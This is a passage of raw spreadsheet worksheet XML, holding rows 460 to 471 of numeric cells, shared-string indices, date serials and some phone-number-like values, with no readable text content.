      <c r="AX460">
        <v>645</v>
      </c>
      <c r="AY460">
        <v>8</v>
      </c>
      <c r="AZ460">
        <v>23</v>
      </c>
      <c r="BA460">
        <v>0</v>
      </c>
      <c r="BB460">
        <v>0</v>
      </c>
      <c r="BC460">
        <v>0</v>
      </c>
      <c r="BD460" t="s">
        <v>12308</v>
      </c>
    </row>
    <row r="461" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A461">
        <v>1307</v>
      </c>
      <c r="B461" t="s">
        <v>3754</v>
      </c>
      <c r="C461" t="s">
        <v>129</v>
      </c>
      <c r="D461" t="s">
        <v>3755</v>
      </c>
      <c r="E461" t="s">
        <v>49</v>
      </c>
      <c r="F461" t="s">
        <v>3756</v>
      </c>
      <c r="G461" s="1">
        <v>44168</v>
      </c>
      <c r="H461">
        <v>6852</v>
      </c>
      <c r="I461">
        <v>6852</v>
      </c>
      <c r="J461">
        <v>0</v>
      </c>
      <c r="K461">
        <v>1</v>
      </c>
      <c r="L461">
        <v>0</v>
      </c>
      <c r="M461">
        <v>0</v>
      </c>
      <c r="N461">
        <v>0</v>
      </c>
      <c r="O461">
        <v>0</v>
      </c>
      <c r="P461">
        <v>0</v>
      </c>
      <c r="Q461">
        <v>2</v>
      </c>
      <c r="R461">
        <v>12</v>
      </c>
      <c r="S461">
        <v>0</v>
      </c>
      <c r="T461">
        <v>1</v>
      </c>
      <c r="U461">
        <v>0</v>
      </c>
      <c r="V461">
        <v>250</v>
      </c>
      <c r="W461">
        <v>0</v>
      </c>
      <c r="X461">
        <v>0</v>
      </c>
      <c r="Y461">
        <v>0</v>
      </c>
      <c r="Z461">
        <v>0</v>
      </c>
      <c r="AA461">
        <v>0</v>
      </c>
      <c r="AB461">
        <v>250</v>
      </c>
      <c r="AC461">
        <v>2500</v>
      </c>
      <c r="AD461">
        <v>0</v>
      </c>
      <c r="AE461">
        <v>100</v>
      </c>
      <c r="AF461" t="s">
        <v>3757</v>
      </c>
      <c r="AG461">
        <v>15211</v>
      </c>
      <c r="AH461">
        <v>11</v>
      </c>
      <c r="AJ461">
        <v>270</v>
      </c>
      <c r="AK461" t="s">
        <v>1048</v>
      </c>
      <c r="AL461" t="s">
        <v>1048</v>
      </c>
      <c r="AM461" t="s">
        <v>3758</v>
      </c>
      <c r="AN461" t="s">
        <v>55</v>
      </c>
      <c r="AO461">
        <v>2017</v>
      </c>
      <c r="AP461">
        <v>82112393111</v>
      </c>
      <c r="AQ461" t="s">
        <v>3759</v>
      </c>
      <c r="AR461" t="s">
        <v>3760</v>
      </c>
      <c r="AS461" t="s">
        <v>57</v>
      </c>
      <c r="AT461" t="s">
        <v>58</v>
      </c>
      <c r="AU461">
        <v>25</v>
      </c>
      <c r="AV461">
        <v>2</v>
      </c>
      <c r="AW461">
        <v>10</v>
      </c>
      <c r="AX461">
        <v>0</v>
      </c>
      <c r="AY461">
        <v>2</v>
      </c>
      <c r="AZ461">
        <v>2</v>
      </c>
      <c r="BA461" t="s">
        <v>16842</v>
      </c>
      <c r="BB461" t="s">
        <v>15188</v>
      </c>
      <c r="BC461">
        <v>0</v>
      </c>
      <c r="BD461" t="s">
        <v>11146</v>
      </c>
    </row>
    <row r="462" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A462">
        <v>1290</v>
      </c>
      <c r="B462" t="s">
        <v>3761</v>
      </c>
      <c r="C462" t="s">
        <v>189</v>
      </c>
      <c r="D462" t="s">
        <v>3762</v>
      </c>
      <c r="E462" t="s">
        <v>142</v>
      </c>
      <c r="F462" t="s">
        <v>3763</v>
      </c>
      <c r="G462" s="1">
        <v>44155</v>
      </c>
      <c r="H462">
        <v>6861</v>
      </c>
      <c r="I462">
        <v>6861</v>
      </c>
      <c r="J462">
        <v>3</v>
      </c>
      <c r="K462">
        <v>3</v>
      </c>
      <c r="L462">
        <v>2</v>
      </c>
      <c r="M462">
        <v>0</v>
      </c>
      <c r="N462">
        <v>0</v>
      </c>
      <c r="O462">
        <v>0</v>
      </c>
      <c r="P462">
        <v>0</v>
      </c>
      <c r="Q462">
        <v>0</v>
      </c>
      <c r="R462">
        <v>0</v>
      </c>
      <c r="S462">
        <v>1</v>
      </c>
      <c r="T462">
        <v>1</v>
      </c>
      <c r="U462">
        <v>30000</v>
      </c>
      <c r="V462">
        <v>3</v>
      </c>
      <c r="W462">
        <v>6000</v>
      </c>
      <c r="X462">
        <v>0</v>
      </c>
      <c r="Y462">
        <v>0</v>
      </c>
      <c r="Z462">
        <v>0</v>
      </c>
      <c r="AA462">
        <v>0</v>
      </c>
      <c r="AB462">
        <v>0</v>
      </c>
      <c r="AC462">
        <v>0</v>
      </c>
      <c r="AD462">
        <v>1</v>
      </c>
      <c r="AE462">
        <v>1000</v>
      </c>
      <c r="AF462" t="s">
        <v>3764</v>
      </c>
      <c r="AG462">
        <v>0</v>
      </c>
      <c r="AH462">
        <v>31</v>
      </c>
      <c r="AJ462">
        <v>455</v>
      </c>
      <c r="AK462" t="s">
        <v>3765</v>
      </c>
      <c r="AL462" t="s">
        <v>3765</v>
      </c>
      <c r="AM462" t="s">
        <v>3766</v>
      </c>
      <c r="AN462" t="s">
        <v>68</v>
      </c>
      <c r="AO462">
        <v>2010</v>
      </c>
      <c r="AP462">
        <v>81248539862</v>
      </c>
      <c r="AQ462" t="s">
        <v>3767</v>
      </c>
      <c r="AR462" t="s">
        <v>3768</v>
      </c>
      <c r="AS462" t="s">
        <v>71</v>
      </c>
      <c r="AT462" t="s">
        <v>72</v>
      </c>
      <c r="AU462">
        <v>26</v>
      </c>
      <c r="AV462">
        <v>1</v>
      </c>
      <c r="AW462">
        <v>0</v>
      </c>
      <c r="AX462">
        <v>0</v>
      </c>
      <c r="AY462">
        <v>62</v>
      </c>
      <c r="AZ462">
        <v>7</v>
      </c>
      <c r="BA462" t="s">
        <v>16606</v>
      </c>
      <c r="BB462" t="s">
        <v>14893</v>
      </c>
      <c r="BC462" t="s">
        <v>9536</v>
      </c>
      <c r="BD462" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="463" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A463">
        <v>1161</v>
      </c>
      <c r="B463" t="s">
        <v>3769</v>
      </c>
      <c r="C463" t="s">
        <v>99</v>
      </c>
      <c r="D463" t="s">
        <v>3770</v>
      </c>
      <c r="E463" t="s">
        <v>809</v>
      </c>
      <c r="F463" t="s">
        <v>3771</v>
      </c>
      <c r="G463" s="1">
        <v>44214</v>
      </c>
      <c r="H463">
        <v>6889</v>
      </c>
      <c r="I463">
        <v>6889</v>
      </c>
      <c r="J463">
        <v>1</v>
      </c>
      <c r="K463">
        <v>0</v>
      </c>
      <c r="L463">
        <v>1</v>
      </c>
      <c r="M463">
        <v>0</v>
      </c>
      <c r="N463">
        <v>0</v>
      </c>
      <c r="O463">
        <v>0</v>
      </c>
      <c r="P463">
        <v>0</v>
      </c>
      <c r="Q463">
        <v>5</v>
      </c>
      <c r="R463">
        <v>1</v>
      </c>
      <c r="S463">
        <v>0</v>
      </c>
      <c r="T463">
        <v>0</v>
      </c>
      <c r="U463">
        <v>50000</v>
      </c>
      <c r="V463">
        <v>0</v>
      </c>
      <c r="W463">
        <v>1000</v>
      </c>
      <c r="X463">
        <v>0</v>
      </c>
      <c r="Y463">
        <v>0</v>
      </c>
      <c r="Z463">
        <v>0</v>
      </c>
      <c r="AA463">
        <v>0</v>
      </c>
      <c r="AB463">
        <v>2000</v>
      </c>
      <c r="AC463">
        <v>1000</v>
      </c>
      <c r="AD463">
        <v>0</v>
      </c>
      <c r="AE463">
        <v>0</v>
      </c>
      <c r="AF463" t="s">
        <v>3772</v>
      </c>
      <c r="AG463">
        <v>11820</v>
      </c>
      <c r="AH463">
        <v>12</v>
      </c>
      <c r="AJ463">
        <v>159</v>
      </c>
      <c r="AK463" t="s">
        <v>303</v>
      </c>
      <c r="AL463" t="s">
        <v>304</v>
      </c>
      <c r="AM463" t="s">
        <v>3773</v>
      </c>
      <c r="AN463" t="s">
        <v>55</v>
      </c>
      <c r="AO463">
        <v>2018</v>
      </c>
      <c r="AP463">
        <v>2126645396</v>
      </c>
      <c r="AQ463" t="s">
        <v>3774</v>
      </c>
      <c r="AR463" t="s">
        <v>3772</v>
      </c>
      <c r="AS463" t="s">
        <v>187</v>
      </c>
      <c r="AT463" t="s">
        <v>58</v>
      </c>
      <c r="AU463">
        <v>26</v>
      </c>
      <c r="AV463">
        <v>1</v>
      </c>
      <c r="AW463">
        <v>10</v>
      </c>
      <c r="AX463">
        <v>2</v>
      </c>
      <c r="AY463">
        <v>12</v>
      </c>
      <c r="AZ463">
        <v>8</v>
      </c>
      <c r="BA463" t="s">
        <v>16812</v>
      </c>
      <c r="BB463" t="s">
        <v>15092</v>
      </c>
      <c r="BC463" t="s">
        <v>9550</v>
      </c>
      <c r="BD463" t="s">
        <v>12301</v>
      </c>
    </row>
    <row r="464" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A464">
        <v>1068</v>
      </c>
      <c r="B464" t="s">
        <v>3775</v>
      </c>
      <c r="C464" t="s">
        <v>157</v>
      </c>
      <c r="D464" t="s">
        <v>3776</v>
      </c>
      <c r="E464" t="s">
        <v>131</v>
      </c>
      <c r="F464" t="s">
        <v>3777</v>
      </c>
      <c r="G464" s="1">
        <v>44379</v>
      </c>
      <c r="H464">
        <v>6913</v>
      </c>
      <c r="I464">
        <v>6913</v>
      </c>
      <c r="J464">
        <v>0</v>
      </c>
      <c r="K464">
        <v>0</v>
      </c>
      <c r="L464">
        <v>0</v>
      </c>
      <c r="M464">
        <v>0</v>
      </c>
      <c r="N464">
        <v>0</v>
      </c>
      <c r="O464">
        <v>0</v>
      </c>
      <c r="P464">
        <v>0</v>
      </c>
      <c r="Q464">
        <v>4</v>
      </c>
      <c r="R464">
        <v>0</v>
      </c>
      <c r="S464">
        <v>1</v>
      </c>
      <c r="T464">
        <v>1</v>
      </c>
      <c r="U464">
        <v>0</v>
      </c>
      <c r="V464">
        <v>0</v>
      </c>
      <c r="W464">
        <v>0</v>
      </c>
      <c r="X464">
        <v>0</v>
      </c>
      <c r="Y464">
        <v>0</v>
      </c>
      <c r="Z464">
        <v>0</v>
      </c>
      <c r="AA464">
        <v>0</v>
      </c>
      <c r="AB464">
        <v>18000</v>
      </c>
      <c r="AC464">
        <v>0</v>
      </c>
      <c r="AD464">
        <v>1</v>
      </c>
      <c r="AE464">
        <v>15000</v>
      </c>
      <c r="AF464" t="s">
        <v>3778</v>
      </c>
      <c r="AG464">
        <v>0</v>
      </c>
      <c r="AH464">
        <v>16</v>
      </c>
      <c r="AJ464">
        <v>241</v>
      </c>
      <c r="AK464" t="s">
        <v>1231</v>
      </c>
      <c r="AL464" t="s">
        <v>1231</v>
      </c>
      <c r="AM464" t="s">
        <v>3779</v>
      </c>
      <c r="AN464" t="s">
        <v>55</v>
      </c>
      <c r="AO464">
        <v>2010</v>
      </c>
      <c r="AP464" t="s">
        <v>3780</v>
      </c>
      <c r="AQ464" t="s">
        <v>3781</v>
      </c>
      <c r="AR464" t="s">
        <v>3782</v>
      </c>
      <c r="AS464" t="s">
        <v>71</v>
      </c>
      <c r="AT464" t="s">
        <v>58</v>
      </c>
      <c r="AU464">
        <v>26</v>
      </c>
      <c r="AV464">
        <v>1</v>
      </c>
      <c r="AW464">
        <v>12</v>
      </c>
      <c r="AX464">
        <v>0</v>
      </c>
      <c r="AY464">
        <v>2</v>
      </c>
      <c r="AZ464">
        <v>1</v>
      </c>
      <c r="BA464" t="s">
        <v>17559</v>
      </c>
      <c r="BB464" t="s">
        <v>15029</v>
      </c>
      <c r="BC464">
        <v>0</v>
      </c>
      <c r="BD464" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="465" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A465">
        <v>1245</v>
      </c>
      <c r="B465" t="s">
        <v>3783</v>
      </c>
      <c r="C465" t="s">
        <v>477</v>
      </c>
      <c r="D465" t="s">
        <v>2022</v>
      </c>
      <c r="E465" t="s">
        <v>944</v>
      </c>
      <c r="F465" t="s">
        <v>945</v>
      </c>
      <c r="G465" s="1">
        <v>44215</v>
      </c>
      <c r="H465">
        <v>6922</v>
      </c>
      <c r="I465">
        <v>6922</v>
      </c>
      <c r="J465">
        <v>1</v>
      </c>
      <c r="K465">
        <v>0</v>
      </c>
      <c r="L465">
        <v>1</v>
      </c>
      <c r="M465">
        <v>0</v>
      </c>
      <c r="N465">
        <v>0</v>
      </c>
      <c r="O465">
        <v>3</v>
      </c>
      <c r="P465">
        <v>4</v>
      </c>
      <c r="Q465">
        <v>0</v>
      </c>
      <c r="R465">
        <v>0</v>
      </c>
      <c r="S465">
        <v>13</v>
      </c>
      <c r="T465">
        <v>1</v>
      </c>
      <c r="U465">
        <v>500000</v>
      </c>
      <c r="V465">
        <v>0</v>
      </c>
      <c r="W465">
        <v>3000</v>
      </c>
      <c r="X465">
        <v>0</v>
      </c>
      <c r="Y465">
        <v>0</v>
      </c>
      <c r="Z465">
        <v>36000</v>
      </c>
      <c r="AA465">
        <v>0</v>
      </c>
      <c r="AB465">
        <v>0</v>
      </c>
      <c r="AC465">
        <v>0</v>
      </c>
      <c r="AD465">
        <v>23340</v>
      </c>
      <c r="AE465">
        <v>172800</v>
      </c>
      <c r="AF465" t="s">
        <v>3784</v>
      </c>
      <c r="AG465">
        <v>95517</v>
      </c>
      <c r="AH465">
        <v>29</v>
      </c>
      <c r="AJ465">
        <v>383</v>
      </c>
      <c r="AK465" t="s">
        <v>2026</v>
      </c>
      <c r="AL465" t="s">
        <v>2027</v>
      </c>
      <c r="AM465" t="s">
        <v>3785</v>
      </c>
      <c r="AN465" t="s">
        <v>55</v>
      </c>
      <c r="AO465">
        <v>1992</v>
      </c>
      <c r="AP465">
        <v>43831235</v>
      </c>
      <c r="AQ465" t="s">
        <v>3786</v>
      </c>
      <c r="AR465" t="s">
        <v>3787</v>
      </c>
      <c r="AS465" t="s">
        <v>71</v>
      </c>
      <c r="AT465" t="s">
        <v>58</v>
      </c>
      <c r="AU465">
        <v>25</v>
      </c>
      <c r="AV465">
        <v>1</v>
      </c>
      <c r="AW465">
        <v>140</v>
      </c>
      <c r="AX465">
        <v>269</v>
      </c>
      <c r="AY465">
        <v>38</v>
      </c>
      <c r="AZ465">
        <v>21</v>
      </c>
      <c r="BA465" t="s">
        <v>17561</v>
      </c>
      <c r="BB465" t="s">
        <v>15149</v>
      </c>
      <c r="BC465" t="s">
        <v>12310</v>
      </c>
      <c r="BD465" t="s">
        <v>12311</v>
      </c>
    </row>
    <row r="466" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A466">
        <v>1347</v>
      </c>
      <c r="B466" t="s">
        <v>3788</v>
      </c>
      <c r="C466" t="s">
        <v>3717</v>
      </c>
      <c r="D466" t="s">
        <v>3789</v>
      </c>
      <c r="E466" t="s">
        <v>111</v>
      </c>
      <c r="F466" t="s">
        <v>3790</v>
      </c>
      <c r="G466" s="1">
        <v>44160</v>
      </c>
      <c r="H466">
        <v>6970</v>
      </c>
      <c r="I466">
        <v>6970</v>
      </c>
      <c r="J466">
        <v>3</v>
      </c>
      <c r="K466">
        <v>4</v>
      </c>
      <c r="L466">
        <v>3</v>
      </c>
      <c r="M466">
        <v>0</v>
      </c>
      <c r="N466">
        <v>0</v>
      </c>
      <c r="O466">
        <v>0</v>
      </c>
      <c r="P466">
        <v>0</v>
      </c>
      <c r="Q466">
        <v>3</v>
      </c>
      <c r="R466">
        <v>3</v>
      </c>
      <c r="S466">
        <v>0</v>
      </c>
      <c r="T466">
        <v>0</v>
      </c>
      <c r="U466">
        <v>400000</v>
      </c>
      <c r="V466">
        <v>500000</v>
      </c>
      <c r="W466">
        <v>400000</v>
      </c>
      <c r="X466">
        <v>0</v>
      </c>
      <c r="Y466">
        <v>0</v>
      </c>
      <c r="Z466">
        <v>0</v>
      </c>
      <c r="AA466">
        <v>0</v>
      </c>
      <c r="AB466">
        <v>30000</v>
      </c>
      <c r="AC466">
        <v>30000</v>
      </c>
      <c r="AD466">
        <v>0</v>
      </c>
      <c r="AE466">
        <v>0</v>
      </c>
      <c r="AF466" t="s">
        <v>3791</v>
      </c>
      <c r="AG466">
        <v>0</v>
      </c>
      <c r="AH466">
        <v>8</v>
      </c>
      <c r="AJ466">
        <v>125</v>
      </c>
      <c r="AK466" t="s">
        <v>3721</v>
      </c>
      <c r="AL466" t="s">
        <v>3722</v>
      </c>
      <c r="AM466" t="s">
        <v>3792</v>
      </c>
      <c r="AN466" t="s">
        <v>68</v>
      </c>
      <c r="AO466">
        <v>1998</v>
      </c>
      <c r="AP466" t="s">
        <v>3793</v>
      </c>
      <c r="AQ466" t="s">
        <v>3794</v>
      </c>
      <c r="AR466" t="s">
        <v>3795</v>
      </c>
      <c r="AS466" t="s">
        <v>71</v>
      </c>
      <c r="AT466" t="s">
        <v>72</v>
      </c>
      <c r="AU466">
        <v>20</v>
      </c>
      <c r="AV466">
        <v>2</v>
      </c>
      <c r="AW466">
        <v>23</v>
      </c>
      <c r="AX466">
        <v>7</v>
      </c>
      <c r="AY466">
        <v>10</v>
      </c>
      <c r="AZ466">
        <v>3</v>
      </c>
      <c r="BA466" t="s">
        <v>16851</v>
      </c>
      <c r="BB466" t="s">
        <v>15216</v>
      </c>
      <c r="BC466" t="s">
        <v>12377</v>
      </c>
      <c r="BD466">
        <v>0</v>
      </c>
    </row>
    <row r="467" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A467">
        <v>1232</v>
      </c>
      <c r="B467" t="s">
        <v>3796</v>
      </c>
      <c r="C467" t="s">
        <v>458</v>
      </c>
      <c r="D467" t="s">
        <v>3797</v>
      </c>
      <c r="E467" t="s">
        <v>300</v>
      </c>
      <c r="F467" t="s">
        <v>3798</v>
      </c>
      <c r="G467" s="1">
        <v>44161</v>
      </c>
      <c r="H467">
        <v>6985</v>
      </c>
      <c r="I467">
        <v>6985</v>
      </c>
      <c r="J467">
        <v>2</v>
      </c>
      <c r="K467">
        <v>1</v>
      </c>
      <c r="L467">
        <v>2</v>
      </c>
      <c r="M467">
        <v>0</v>
      </c>
      <c r="N467">
        <v>0</v>
      </c>
      <c r="O467">
        <v>0</v>
      </c>
      <c r="P467">
        <v>0</v>
      </c>
      <c r="Q467">
        <v>0</v>
      </c>
      <c r="R467">
        <v>0</v>
      </c>
      <c r="S467">
        <v>0</v>
      </c>
      <c r="T467">
        <v>0</v>
      </c>
      <c r="U467">
        <v>200000</v>
      </c>
      <c r="V467">
        <v>10000</v>
      </c>
      <c r="W467">
        <v>10000</v>
      </c>
      <c r="X467">
        <v>0</v>
      </c>
      <c r="Y467">
        <v>0</v>
      </c>
      <c r="Z467">
        <v>0</v>
      </c>
      <c r="AA467">
        <v>0</v>
      </c>
      <c r="AB467">
        <v>0</v>
      </c>
      <c r="AC467">
        <v>0</v>
      </c>
      <c r="AD467">
        <v>0</v>
      </c>
      <c r="AE467">
        <v>0</v>
      </c>
      <c r="AF467" t="s">
        <v>3799</v>
      </c>
      <c r="AG467">
        <v>29783</v>
      </c>
      <c r="AH467">
        <v>5</v>
      </c>
      <c r="AJ467">
        <v>150</v>
      </c>
      <c r="AK467" t="s">
        <v>3800</v>
      </c>
      <c r="AL467" t="s">
        <v>3801</v>
      </c>
      <c r="AM467" t="s">
        <v>3802</v>
      </c>
      <c r="AN467" t="s">
        <v>55</v>
      </c>
      <c r="AO467">
        <v>2017</v>
      </c>
      <c r="AP467">
        <v>81324616169</v>
      </c>
      <c r="AQ467" t="s">
        <v>3803</v>
      </c>
      <c r="AR467" t="s">
        <v>3804</v>
      </c>
      <c r="AS467" t="s">
        <v>71</v>
      </c>
      <c r="AT467" t="s">
        <v>58</v>
      </c>
      <c r="AU467">
        <v>0</v>
      </c>
      <c r="AV467">
        <v>0</v>
      </c>
      <c r="AW467">
        <v>13</v>
      </c>
      <c r="AX467">
        <v>4</v>
      </c>
      <c r="AY467">
        <v>2</v>
      </c>
      <c r="AZ467">
        <v>0</v>
      </c>
      <c r="BA467" t="s">
        <v>16774</v>
      </c>
      <c r="BB467" t="s">
        <v>15142</v>
      </c>
      <c r="BC467">
        <v>0</v>
      </c>
      <c r="BD467" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="468" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A468">
        <v>1210</v>
      </c>
      <c r="B468" t="s">
        <v>3805</v>
      </c>
      <c r="C468" t="s">
        <v>3717</v>
      </c>
      <c r="D468" t="s">
        <v>3806</v>
      </c>
      <c r="E468" t="s">
        <v>142</v>
      </c>
      <c r="F468" t="s">
        <v>2519</v>
      </c>
      <c r="G468" s="1">
        <v>44151</v>
      </c>
      <c r="H468">
        <v>7017</v>
      </c>
      <c r="I468">
        <v>7017</v>
      </c>
      <c r="J468">
        <v>2</v>
      </c>
      <c r="K468">
        <v>2</v>
      </c>
      <c r="L468">
        <v>0</v>
      </c>
      <c r="M468">
        <v>0</v>
      </c>
      <c r="N468">
        <v>0</v>
      </c>
      <c r="O468">
        <v>0</v>
      </c>
      <c r="P468">
        <v>0</v>
      </c>
      <c r="Q468">
        <v>2</v>
      </c>
      <c r="R468">
        <v>2</v>
      </c>
      <c r="S468">
        <v>0</v>
      </c>
      <c r="T468">
        <v>0</v>
      </c>
      <c r="U468">
        <v>400000</v>
      </c>
      <c r="V468">
        <v>400000</v>
      </c>
      <c r="W468">
        <v>0</v>
      </c>
      <c r="X468">
        <v>0</v>
      </c>
      <c r="Y468">
        <v>0</v>
      </c>
      <c r="Z468">
        <v>0</v>
      </c>
      <c r="AA468">
        <v>0</v>
      </c>
      <c r="AB468">
        <v>400</v>
      </c>
      <c r="AC468">
        <v>400</v>
      </c>
      <c r="AD468">
        <v>0</v>
      </c>
      <c r="AE468">
        <v>0</v>
      </c>
      <c r="AF468" t="s">
        <v>3807</v>
      </c>
      <c r="AG468">
        <v>0</v>
      </c>
      <c r="AH468">
        <v>8</v>
      </c>
      <c r="AJ468">
        <v>125</v>
      </c>
      <c r="AK468" t="s">
        <v>3808</v>
      </c>
      <c r="AL468" t="s">
        <v>3809</v>
      </c>
      <c r="AM468" t="s">
        <v>3810</v>
      </c>
      <c r="AN468" t="s">
        <v>68</v>
      </c>
      <c r="AO468">
        <v>2017</v>
      </c>
      <c r="AP468">
        <v>85268817777</v>
      </c>
      <c r="AQ468" t="s">
        <v>3811</v>
      </c>
      <c r="AR468" t="s">
        <v>3807</v>
      </c>
      <c r="AS468" t="s">
        <v>71</v>
      </c>
      <c r="AT468" t="s">
        <v>72</v>
      </c>
      <c r="AU468">
        <v>30</v>
      </c>
      <c r="AV468">
        <v>1</v>
      </c>
      <c r="AW468">
        <v>5</v>
      </c>
      <c r="AX468">
        <v>0</v>
      </c>
      <c r="AY468">
        <v>4</v>
      </c>
      <c r="AZ468">
        <v>1</v>
      </c>
      <c r="BA468" t="s">
        <v>17568</v>
      </c>
      <c r="BB468" t="s">
        <v>15126</v>
      </c>
      <c r="BC468" t="s">
        <v>12340</v>
      </c>
      <c r="BD468">
        <v>0</v>
      </c>
    </row>
    <row r="469" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A469">
        <v>1352</v>
      </c>
      <c r="B469" t="s">
        <v>3812</v>
      </c>
      <c r="C469" t="s">
        <v>458</v>
      </c>
      <c r="D469" t="s">
        <v>3813</v>
      </c>
      <c r="E469" t="s">
        <v>843</v>
      </c>
      <c r="F469" t="s">
        <v>3814</v>
      </c>
      <c r="G469" s="1">
        <v>44322</v>
      </c>
      <c r="H469">
        <v>7033</v>
      </c>
      <c r="I469">
        <v>7033</v>
      </c>
      <c r="J469">
        <v>1</v>
      </c>
      <c r="K469">
        <v>0</v>
      </c>
      <c r="L469">
        <v>0</v>
      </c>
      <c r="M469">
        <v>0</v>
      </c>
      <c r="N469">
        <v>0</v>
      </c>
      <c r="O469">
        <v>0</v>
      </c>
      <c r="P469">
        <v>0</v>
      </c>
      <c r="Q469">
        <v>0</v>
      </c>
      <c r="R469">
        <v>0</v>
      </c>
      <c r="S469">
        <v>0</v>
      </c>
      <c r="T469">
        <v>0</v>
      </c>
      <c r="U469">
        <v>3000</v>
      </c>
      <c r="V469">
        <v>0</v>
      </c>
      <c r="W469">
        <v>0</v>
      </c>
      <c r="X469">
        <v>0</v>
      </c>
      <c r="Y469">
        <v>0</v>
      </c>
      <c r="Z469">
        <v>0</v>
      </c>
      <c r="AA469">
        <v>0</v>
      </c>
      <c r="AB469">
        <v>0</v>
      </c>
      <c r="AC469">
        <v>0</v>
      </c>
      <c r="AD469">
        <v>0</v>
      </c>
      <c r="AE469">
        <v>0</v>
      </c>
      <c r="AF469" t="s">
        <v>3812</v>
      </c>
      <c r="AG469">
        <v>0</v>
      </c>
      <c r="AH469">
        <v>5</v>
      </c>
      <c r="AJ469">
        <v>153</v>
      </c>
      <c r="AK469" t="s">
        <v>3815</v>
      </c>
      <c r="AL469" t="s">
        <v>3816</v>
      </c>
      <c r="AM469" t="s">
        <v>3817</v>
      </c>
      <c r="AN469" t="s">
        <v>55</v>
      </c>
      <c r="AO469">
        <v>2018</v>
      </c>
      <c r="AP469">
        <v>81277575984</v>
      </c>
      <c r="AQ469" t="s">
        <v>3818</v>
      </c>
      <c r="AR469" t="s">
        <v>3819</v>
      </c>
      <c r="AS469" t="s">
        <v>71</v>
      </c>
      <c r="AT469" t="s">
        <v>58</v>
      </c>
      <c r="AU469">
        <v>22</v>
      </c>
      <c r="AV469">
        <v>1</v>
      </c>
      <c r="AW469">
        <v>0</v>
      </c>
      <c r="AX469">
        <v>0</v>
      </c>
      <c r="AY469">
        <v>46</v>
      </c>
      <c r="AZ469">
        <v>1</v>
      </c>
      <c r="BA469" t="s">
        <v>17569</v>
      </c>
      <c r="BB469" t="s">
        <v>15218</v>
      </c>
      <c r="BC469" t="s">
        <v>9638</v>
      </c>
      <c r="BD469" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="470" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A470">
        <v>1197</v>
      </c>
      <c r="B470" t="s">
        <v>3820</v>
      </c>
      <c r="C470" t="s">
        <v>477</v>
      </c>
      <c r="D470" t="s">
        <v>3821</v>
      </c>
      <c r="E470" t="s">
        <v>300</v>
      </c>
      <c r="F470" t="s">
        <v>899</v>
      </c>
      <c r="G470" s="1">
        <v>44145</v>
      </c>
      <c r="H470">
        <v>7049</v>
      </c>
      <c r="I470">
        <v>7049</v>
      </c>
      <c r="J470">
        <v>2</v>
      </c>
      <c r="K470">
        <v>1</v>
      </c>
      <c r="L470">
        <v>1</v>
      </c>
      <c r="M470">
        <v>0</v>
      </c>
      <c r="N470">
        <v>0</v>
      </c>
      <c r="O470">
        <v>0</v>
      </c>
      <c r="P470">
        <v>0</v>
      </c>
      <c r="Q470">
        <v>0</v>
      </c>
      <c r="R470">
        <v>5</v>
      </c>
      <c r="S470">
        <v>0</v>
      </c>
      <c r="T470">
        <v>1</v>
      </c>
      <c r="U470">
        <v>40000</v>
      </c>
      <c r="V470">
        <v>2000</v>
      </c>
      <c r="W470">
        <v>5000</v>
      </c>
      <c r="X470">
        <v>0</v>
      </c>
      <c r="Y470">
        <v>0</v>
      </c>
      <c r="Z470">
        <v>0</v>
      </c>
      <c r="AA470">
        <v>0</v>
      </c>
      <c r="AB470">
        <v>0</v>
      </c>
      <c r="AC470">
        <v>5000</v>
      </c>
      <c r="AD470">
        <v>0</v>
      </c>
      <c r="AE470">
        <v>5000</v>
      </c>
      <c r="AF470" t="s">
        <v>3822</v>
      </c>
      <c r="AG470">
        <v>95526</v>
      </c>
      <c r="AH470">
        <v>29</v>
      </c>
      <c r="AJ470">
        <v>383</v>
      </c>
      <c r="AK470" t="s">
        <v>2986</v>
      </c>
      <c r="AL470" t="s">
        <v>3596</v>
      </c>
      <c r="AM470" t="s">
        <v>3823</v>
      </c>
      <c r="AN470" t="s">
        <v>55</v>
      </c>
      <c r="AO470">
        <v>2010</v>
      </c>
      <c r="AP470" t="s">
        <v>3824</v>
      </c>
      <c r="AQ470" t="s">
        <v>3825</v>
      </c>
      <c r="AR470" t="s">
        <v>3822</v>
      </c>
      <c r="AS470" t="s">
        <v>71</v>
      </c>
      <c r="AT470" t="s">
        <v>58</v>
      </c>
      <c r="AU470">
        <v>25</v>
      </c>
      <c r="AV470">
        <v>1</v>
      </c>
      <c r="AW470">
        <v>22</v>
      </c>
      <c r="AX470">
        <v>10</v>
      </c>
      <c r="AY470">
        <v>12</v>
      </c>
      <c r="AZ470">
        <v>14</v>
      </c>
      <c r="BA470" t="s">
        <v>17565</v>
      </c>
      <c r="BB470" t="s">
        <v>15115</v>
      </c>
      <c r="BC470">
        <v>0</v>
      </c>
      <c r="BD470" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="471" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A471">
        <v>1459</v>
      </c>
      <c r="B471" t="s">
        <v>3826</v>
      </c>
      <c r="C471" t="s">
        <v>3013</v>
      </c>
      <c r="D471" t="s">
        <v>3827</v>
      </c>
      <c r="E471" t="s">
        <v>843</v>
      </c>
      <c r="F471" t="s">
        <v>3828</v>
      </c>
      <c r="G471" s="1">
        <v>44182</v>
      </c>
      <c r="H471">
        <v>7114</v>
      </c>
      <c r="I471">
        <v>7114</v>
      </c>
      <c r="J471">
        <v>0</v>
      </c>
      <c r="K471">
        <v>1</v>
      </c>
      <c r="L471">
        <v>0</v>
      </c>
      <c r="M471">
        <v>0</v>
      </c>
      <c r="N471">
        <v>0</v>
      </c>
      <c r="O471">
        <v>0</v>
      </c>
      <c r="P471">
        <v>0</v>
      </c>
      <c r="Q471">
        <v>1</v>
      </c>
      <c r="R471">
        <v>10</v>
      </c>
      <c r="S471">
